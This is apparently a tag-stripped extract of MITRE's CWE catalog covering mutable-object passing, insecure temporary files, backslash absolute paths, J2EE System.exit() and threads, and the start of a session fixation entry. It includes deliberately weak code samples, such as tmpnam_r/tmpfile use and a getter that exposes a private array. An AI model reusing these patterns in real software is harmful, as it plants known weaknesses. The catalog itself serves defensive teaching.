Other_Notes, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + State Synchronization Error + + + + The product sends non-cloned mutable data as an argument to a method or function. + The function or method that has been called can alter or delete the mutable data. This could violate assumptions that the calling function has made about its state. In situations where unknown code is called with references to mutable data, this external code could make changes to the data sent. If this data was not previously cloned, the modified data might not be valid in the context of execution. + + + + + + + + + + + + Implementation + + + Medium + + + Integrity + Modify Memory + Potentially data could be tampered with by another function which should not have been tampered with. + + + + + Implementation + Pass in data which should not be altered as constant or immutable. + + + Implementation + Clone all mutable data before passing it into an external function . This is the preferred mitigation. This way, regardless of what changes are made to the data, a valid copy is retained for use by the class. + + + + + The following example demonstrates the weakness. + + private:int foo;complexType bar;String baz;otherClass externalClass; + + public:void doStuff() {externalClass.doOtherStuff(foo, bar, baz)} + + + In this example, bar and baz will be passed by reference to doOtherStuff() which may change them. + + + In the following Java example, the BookStore class manages the sale of books in a bookstore, this class includes the member objects for the bookstore inventory and sales database manager classes. The BookStore class includes a method for updating the sales database and inventory when a book is sold. This method retrieves a Book object from the bookstore inventory object using the supplied ISBN number for the book class, then calls a method for the sales object to update the sales information and then calls a method for the inventory object to update inventory for the BookStore. + + public class BookStore { + private BookStoreInventory inventory;private SalesDBManager sales;... + // constructor for BookStore + public BookStore() {this.inventory = new BookStoreInventory();this.sales = new SalesDBManager();...}public void updateSalesAndInventoryForBookSold(String bookISBN) { + + + // Get book object from inventory using ISBN + Book book = inventory.getBookWithISBN(bookISBN); + // update sales information for book sold + sales.updateSalesInformation(book); + // update inventory + inventory.updateInventory(book); + } + // other BookStore methods + ... + }public class Book {private String title;private String author;private String isbn; + // Book object constructors and get/set methods + ...} + + However, in this example the Book object that is retrieved and passed to the method of the sales object could have its contents modified by the method. This could cause unexpected results when the book object is sent to the method for the inventory object to update the inventory. + In the Java programming language arguments to methods are passed by value, however in the case of objects a reference to the object is passed by value to the method. When an object reference is passed as a method argument a copy of the object reference is made within the method and therefore both references point to the same object. This allows the contents of the object to be modified by the method that holds the copy of the object reference. [REF-374] + In this case the contents of the Book object could be modified by the method of the sales object prior to the call to update the inventory. + To prevent the contents of the Book object from being modified, a copy of the Book object should be made before the method call to the sales object. In the following example a copy of the Book object is made using the clone() method and the copy of the Book object is passed to the method of the sales object. This will prevent any changes being made to the original Book object. + + ...public void updateSalesAndInventoryForBookSold(String bookISBN) { + + + // Get book object from inventory using ISBN + Book book = inventory.getBookWithISBN(bookISBN); + // Create copy of book object to make sure contents are not changed + Book bookSold = (Book) book.clone(); + // update sales information for book sold + sales.updateSalesInformation(bookSold); + // update inventory + inventory.updateInventory(book); + }... + + + + + + Passing mutable objects to an untrusted method + + + OBJ04-J + Provide mutable classes with copy functionality to safely allow passing instances to untrusted code + + + SFP23 + Exposed Data + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-06-21 + updated Name, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-12-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2014-06-23 + updated Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Mutable Objects Passed by Reference + + + + Sending non-cloned mutable data as a return value may result in that data being altered or deleted by the calling function. + In situations where functions return references to mutable data, it is possible that the external code which called the function may make changes to the data sent. If this data was not previously cloned, the class will then be using modified data which may violate assumptions about its internal state. + + + + + + + + + + + + Implementation + + + Medium + + + Access Control + Integrity + Modify Memory + Potentially data could be tampered with by another function which should not have been tampered with. + + + + + Implementation + Declare returned data which should not be altered as constant or immutable. + + + Implementation + Clone all mutable data before returning references to it. This is the preferred mitigation. This way, regardless of what changes are made to the data, a valid copy is retained for use by the class. + + + + + This class has a private list of patients, but provides a way to see the list : + + public class ClinicalTrial {private PatientClass[] patientList = new PatientClass[50];public getPatients(...){return patientList;}} + + While this code only means to allow reading of the patient list, the getPatients() method returns a reference to the class's original patient list instead of a reference to a copy of the list. Any caller of this method can arbitrarily modify the contents of the patient list even though it is a private member of the class. + + + + + Mutable object returned + + + OBJ04-J + Provide mutable classes with copy functionality to safely allow passing instances to untrusted code + + + OBJ05-J + Defensively copy private mutable class members before returning their references + + + EXP34-PL + Do not modify $_ in list or sorting functions + Imprecise + + + SFP23 + Exposed Data + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-09-27 + updated Name, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2014-06-23 + updated Description, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Passing Mutable Objects to an Untrusted Method + + + + Creating and using insecure temporary files can leave application and system data vulnerable to attack. + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + The following code uses a temporary file for storing intermediate data gathered from the network before it is processed. + + if (tmpnam_r(filename)) { + + FILE* tmp = fopen(filename,"wb+");while((recv(sock,recvbuf,DATA_SIZE, 0) > 0)&(amt!=0)) amt = fwrite(recvbuf,1,DATA_SIZE,tmp); + }... + + This otherwise unremarkable code is vulnerable to a number of different attacks because it relies on an insecure method for creating temporary files. The vulnerabilities introduced by this function and others are described in the following sections. The most egregious security problems related to temporary file creation have occurred on Unix-based operating systems, but Windows applications have parallel risks. This section includes a discussion of temporary file creation on both Unix and Windows systems. Methods and behaviors can vary between systems, but the fundamental risks introduced by each are reasonably constant. + + + + + Insecure Temporary File + + + CON33-C + Avoid race conditions when using library functions + Imprecise + + + FIO00-J + Do not operate on files in shared directories + + + + + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + Applications require temporary files so frequently that many different mechanisms exist for creating them in the C Library and Windows(R) API. Most of these functions are vulnerable to various forms of attacks. + The functions designed to aid in the creation of temporary files can be broken into two groups based whether they simply provide a filename or actually open a new file. - Group 1: "Unique" Filenames: The first group of C Library and WinAPI functions designed to help with the process of creating temporary files do so by generating a unique file name for a new temporary file, which the program is then supposed to open. This group includes C Library functions like tmpnam(), tempnam(), mktemp() and their C++ equivalents prefaced with an _ (underscore) as well as the GetTempFileName() function from the Windows API. This group of functions suffers from an underlying race condition on the filename chosen. Although the functions guarantee that the filename is unique at the time it is selected, there is no mechanism to prevent another process or an attacker from creating a file with the same name after it is selected but before the application attempts to open the file. Beyond the risk of a legitimate collision caused by another call to the same function, there is a high probability that an attacker will be able to create a malicious collision because the filenames generated by these functions are not sufficiently randomized to make them difficult to guess. If a file with the selected name is created, then depending on how the file is opened the existing contents or access permissions of the file may remain intact. If the existing contents of the file are malicious in nature, an attacker may be able to inject dangerous data into the application when it reads data back from the temporary file. If an attacker pre-creates the file with relaxed access permissions, then data stored in the temporary file by the application may be accessed, modified or corrupted by an attacker. On Unix based systems an even more insidious attack is possible if the attacker pre-creates the file as a link to another important file. Then, if the application truncates or writes data to the file, it may unwittingly perform damaging operations for the attacker. This is an especially serious threat if the program operates with elevated permissions. Finally, in the best case the file will be opened with the a call to open() using the O_CREAT and O_EXCL flags or to CreateFile() using the CREATE_NEW attribute, which will fail if the file already exists and therefore prevent the types of attacks described above. However, if an attacker is able to accurately predict a sequence of temporary file names, then the application may be prevented from opening necessary temporary storage causing a denial of service (DoS) attack. This type of attack would not be difficult to mount given the small amount of randomness used in the selection of the filenames generated by these functions. - Group 2: "Unique" Files: The second group of C Library functions attempts to resolve some of the security problems related to temporary files by not only generating a unique file name, but also opening the file. This group includes C Library functions like tmpfile() and its C++ equivalents prefaced with an _ (underscore), as well as the slightly better-behaved C Library function mkstemp(). The tmpfile() style functions construct a unique filename and open it in the same way that fopen() would if passed the flags "wb+", that is, as a binary file in read/write mode. If the file already exists, tmpfile() will truncate it to size zero, possibly in an attempt to assuage the security concerns mentioned earlier regarding the race condition that exists between the selection of a supposedly unique filename and the subsequent opening of the selected file. However, this behavior clearly does not solve the function's security problems. First, an attacker can pre-create the file with relaxed access-permissions that will likely be retained by the file opened by tmpfile(). Furthermore, on Unix based systems if the attacker pre-creates the file as a link to another important file, the application may use its possibly elevated permissions to truncate that file, thereby doing damage on behalf of the attacker. Finally, if tmpfile() does create a new file, the access permissions applied to that file will vary from one operating system to another, which can leave application data vulnerable even if an attacker is unable to predict the filename to be used in advance. Finally, mkstemp() is a reasonably safe way create temporary files. It will attempt to create and open a unique file based on a filename template provided by the user combined with a series of randomly generated characters. If it is unable to create such a file, it will fail and return -1. On modern systems the file is opened using mode 0600, which means the file will be secure from tampering unless the user explicitly changes its access permissions. However, mkstemp() still suffers from the use of predictable file names and can leave an application vulnerable to denial of service attacks if an attacker causes mkstemp() to fail by predicting and pre-creating the filenames to be used. + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-02-16 + updated References + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, References, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships, Type + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + + + Opening temporary files without appropriate measures or controls can leave the file, its contents and any function that it impacts vulnerable to attack. + + + + + + + + + Implementation + + + High + + + Confidentiality + Read Application Data + If the temporary file can be read by the attacker, sensitive information may be in that file which could be revealed. + + + Authorization + Other + Other + If that file can be written to by the attacker, the file might be moved into a place to which the attacker does not have access. This will allow the attacker to gain selective resource access-control privileges. + + + Integrity + Other + Other + Depending on the data stored in the temporary file, there is the potential for an attacker to gain an additional input vector which is trusted as non-malicious. It may be possible to make arbitrary changes to data structures, user information, or even process ownership. + + + + + Requirements + Many contemporary languages have functions which properly handle this condition. Older C temp file functions are especially susceptible. + + + Implementation + Ensure that you use proper file permissions. This can be achieved by using a safe temp file function. Temporary files should be writable and readable only by the process that owns the file. + + + Implementation + Randomize temporary file names. This can also be achieved by using a safe temp-file function. This will ensure that temporary files will not be created in predictable places. + + + + + In the following code examples a temporary file is created and written to. After using the temporary file, the file is closed and deleted from the file system. + + FILE *stream;if( (stream = tmpfile()) == NULL ) { + + perror("Could not open new temporary file\n");return (-1); + } + // write data to tmp file + ...// remove tmp filermtmp(); + + However, within this C/C++ code the method tmpfile() is used to create and open the temp file. The tmpfile() method works the same way as the fopen() method would with read/write permission, allowing attackers to read potentially sensitive information contained in the temp file or modify the contents of the file. + + try {File temp = File.createTempFile("pattern", ".suffix");temp.deleteOnExit();BufferedWriter out = new BufferedWriter(new FileWriter(temp));out.write("aString");out.close();}catch (IOException e) {} + + Similarly, the createTempFile() method used in the Java code creates a temp file that may be readable and writable to all users. + Additionally both methods used above place the file into a default directory. On UNIX systems the default directory is usually "/tmp" or "/var/tmp" and on Windows systems the default directory is usually "C:\\Windows\\Temp", which may be easily accessible to attackers, possibly enabling them to read and modify the contents of the temp file. + + + + + Improper temp file opening + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences, Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Demonstrative_Examples + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Improper Temporary File Opening + + + + The product creates a temporary file in a directory whose permissions allow unintended actors to determine the file's existence or otherwise access that file. + On some operating systems, the fact that the temporary file exists may be apparent to any user with sufficient privileges to access that directory. Since the file is visible, the application that is using the temporary file could be known. If one has access to list the processes on the system, the attacker has gained information about what the user is doing at that time. By correlating this with the applications the user is running, an attacker could potentially discover what a user's actions are. From this, higher levels of security could be breached. + + + + + + + + + Implementation + + + Low + + + Confidentiality + Read Application Data + Since the file is visible and the application which is using the temp file could be known, the attacker has gained information about what the user is doing at that time. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Requirements + Many contemporary languages have functions which properly handle this condition. Older C temp file functions are especially susceptible. + + + Implementation + Try to store sensitive tempfiles in a directory which is not world readable -- i.e., per-user directories. + + + Implementation + Avoid using vulnerable temp file functions. + + + + + In the following code examples a temporary file is created and written to. After using the temporary file, the file is closed and deleted from the file system. + + FILE *stream;if( (stream = tmpfile()) == NULL ) { + + perror("Could not open new temporary file\n");return (-1); + } + // write data to tmp file + ...// remove tmp filermtmp(); + + However, within this C/C++ code the method tmpfile() is used to create and open the temp file. The tmpfile() method works the same way as the fopen() method would with read/write permission, allowing attackers to read potentially sensitive information contained in the temp file or modify the contents of the file. + + try {File temp = File.createTempFile("pattern", ".suffix");temp.deleteOnExit();BufferedWriter out = new BufferedWriter(new FileWriter(temp));out.write("aString");out.close();}catch (IOException e) {} + + Similarly, the createTempFile() method used in the Java code creates a temp file that may be readable and writable to all users. + Additionally both methods used above place the file into a default directory. On UNIX systems the default directory is usually "/tmp" or "/var/tmp" and on Windows systems the default directory is usually "C:\\Windows\\Temp", which may be easily accessible to attackers, possibly enabling them to read and modify the contents of the temp file. + + + + + Guessed or visible temporary file + + + FIO15-C + Ensure that file operations are performed in a secure directory + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Name + + + CWE Content Team + MITRE + 2009-07-27 + updated Description, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Demonstrative_Examples, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Name, References, Relationships, Type + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Guessed or Visible Temporary File + Creation of Temporary File in Directory with Insecure Permissions + Creation of Temporary File in Directory with Incorrect Permissions + + + + The product accepts input in the form of a backslash absolute path ('\absolute\pathname\here') without appropriate validation, which can allow an attacker to traverse the file system to unintended locations or access arbitrary files. + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. + Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. + + High + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-1999-1263 + Mail client allows remote attackers to overwrite arbitrary files via an e-mail message containing a uuencoded attachment that specifies the full pathname for the file to be modified. + https://www.cve.org/CVERecord?id=CVE-1999-1263 + + + CVE-2003-0753 + Remote attackers can read arbitrary files via a full pathname to the target file in config parameter. + https://www.cve.org/CVERecord?id=CVE-2003-0753 + + + CVE-2002-1525 + Remote attackers can read arbitrary files via an absolute pathname. + https://www.cve.org/CVERecord?id=CVE-2002-1525 + + + + + \absolute\pathname\here ('backslash absolute path') + + + FIO05-C + Identify files using multiple file attributes + + + SFP16 + Path Traversal + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Observed_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-03-15 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Backslash Absolute Path - \absolute\pathname\here + + + + A J2EE application uses System.exit(), which also shuts down its container. + It is never a good idea for a web application to attempt to shut down the application container. Access to a function that can shut down the application is an avenue for Denial of Service (DoS) attacks. + + + + + + + + + Implementation + A call to System.exit() is probably part of leftover debug code or code imported from a non-J2EE application. + + + + + Availability + DoS: Crash, Exit, or Restart + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Separation of Privilege + The shutdown function should be a privileged function available only to a properly authorized administrative user + + + Implementation + Web applications should not call methods that cause the virtual machine to exit, such as System.exit() + + + Implementation + Web applications should also not throw any Throwables to the application server as this may adversely affect the container. + + + Implementation + Non-web applications may have a main() method that contains a System.exit(), but generally should not call System.exit() from other locations in the code + + + + + Included in the doPost() method defined below is a call to System.exit() in the event of a specific exception. + + Public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {try {...} catch (ApplicationSpecificException ase) {logger.error("Caught: " + ase.toString());System.exit(1);}} + + + + + + J2EE Bad Practices: System.exit() + + + A9 + Denial of Service + CWE More Specific + + + ERR09-J + Do not allow untrusted code to terminate the JVM + + + SFP3 + Use of an improper API + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated Description, Modes_of_Introduction, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + J2EE Bad Practices: System.exit() + + + + Thread management in a Web application is forbidden in some circumstances and is always highly error prone. + Thread management in a web application is forbidden by the J2EE standard in some circumstances and is always highly error prone. Managing threads is difficult and is likely to interfere in unpredictable ways with the behavior of the application container. Even without interfering with the container, thread management usually leads to bugs that are hard to detect and diagnose like deadlock, race conditions, and other synchronization errors. + + + + + + + + + Implementation + + + + + Other + Quality Degradation + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + For EJB, use framework approaches for parallel execution, instead of using threads. + + + + + In the following example, a new Thread object is created and invoked directly from within the body of a doGet() method in a Java servlet. + + public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { + + + // Perform servlet tasks. + ... + + // Create a new thread to handle background processing. + Runnable r = new Runnable() { + public void run() { + + + // Process and store request statistics. + ... + } + }; + new Thread(r).start(); + } + + + + + System Process + + + + J2EE Bad Practices: Threads + + + SFP3 + Use of an improper API + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-12-13 + updated Description, Other_Notes, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + J2EE Bad Practices: Threads + J2EE Bad Practices: Use of Threads + + + + Authenticating a user, or otherwise establishing a new user session, without invalidating any existing session identifier gives an attacker the opportunity to steal authenticated sessions. + + Such a scenario is commonly observed when: + + A web application authenticates a user without first invalidating the existing session, thereby continuing to use the session already associated with the user. + An attacker is able to force a known session identifier on a user so that, once the user authenticates, the attacker has access to the authenticated session. + The application or container uses predictable session identifiers. In the generic exploit of session fixation vulnerabilities, an attacker creates a new session on a web application and records the associated session identifier. The attacker then causes the victim to associate, and possibly authenticate, against the server using that session identifier, giving the attacker access to the user's account through the active session. + + + + + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Access Control + 